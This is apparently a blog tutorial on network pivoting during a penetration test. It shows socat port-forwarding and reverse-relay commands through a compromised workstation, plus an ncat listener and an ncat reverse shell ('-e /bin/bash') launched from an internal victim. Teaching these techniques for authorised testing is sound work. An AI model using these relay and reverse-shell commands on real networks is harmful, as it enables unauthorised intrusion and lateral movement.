In this example 10.10.10.102 is our pivot. In our scenario this workstation has 2 network interfaces: one public faced to internet (let me say for example 213.45.44.166 — please note this is an example!) and other one for internal network (10.10.10.102)
From our attacking machine you can’t communicate directly with 10.10.10.101 they are behind NAT. But you can reach the server sit in DMZ (213.45.44.166) that in turn can connect to 10.10.10.101 and others workstations in LANs.
So if you have a shell on our pivot workstation you have many options to attack other computers in LAN: one is install all hacking tools on 10.10.10.102 that will be our new attacking machine, but it’s a bad idea and it’s not elegant (blue team approved). You can also use metasploit add route feature or socks proxy (msf5, in msf6 was removed) if we have a meterpreter shell, in this way we land inside LAN.
But what if you can’t use metasploit ? You can just use this server as pivot (10.10.10.102) and launch our attacks from our attacking machine to others computers in LAN (10.10.10.101 in this case) just using SOCAT !
So on our pivot we run a command like this:
socat TCP4-LISTEN:8080,fork TCP4:10.10.10.101:80The explanation of this command is really easy: all connections directed to our pivot (in this case using public interface) on port 8080 will be redirect to 10.10.10.101 on port 80.
So from our attacking machine if we run Firefox we can surf the port 80 on 10.10.10.101 using 10.10.10.102 as pivot: http://public_ip_of_our_pivot:8080
Get calfcrusher’s stories in your inbox
Join Medium for free to get updates from this writer.
Nice, true ? :-)
But what if we need to pop a reverse shell on 10.10.10.101 that goes directly to our attacking machine? In real scenario 10.10.10.101 could be a workstation that can’t communicate to internet. Maybe an internal server.
Here, socat will help us again. And 10.10.10.102 will be our pivot again: let me say that we found a RCE on 10.10.10.101 so we can run commands.
But before we need to create a socat reverse relay on our pivot:
socat tcp-l:6666 tcp:IP_ATTACKING_MACHINE:6666Then on our attacking machine we open a listener:
ncat -nlvp 6666And finally from 10.10.10.101 we run a reverse shell command like this:
ncat 10.10.10.102 6666 -e /bin/bashThe shell will goes to 10.10.10.102 that redirects all TCP traffic on port 6666 to our attacking machine.
Here’s an image that explain this process (please note that IPs are different from our scenario, i’m lazy and i don’t want to edit this image. Please also note that in this image we have a double pivot !)
Press enter or click to view image in full size
Easy, right ?
Just remember that using socat it’s not the only option: you can use also chisel… ssh…. iptables (if we’re root) and all nice things that we have on metasploit.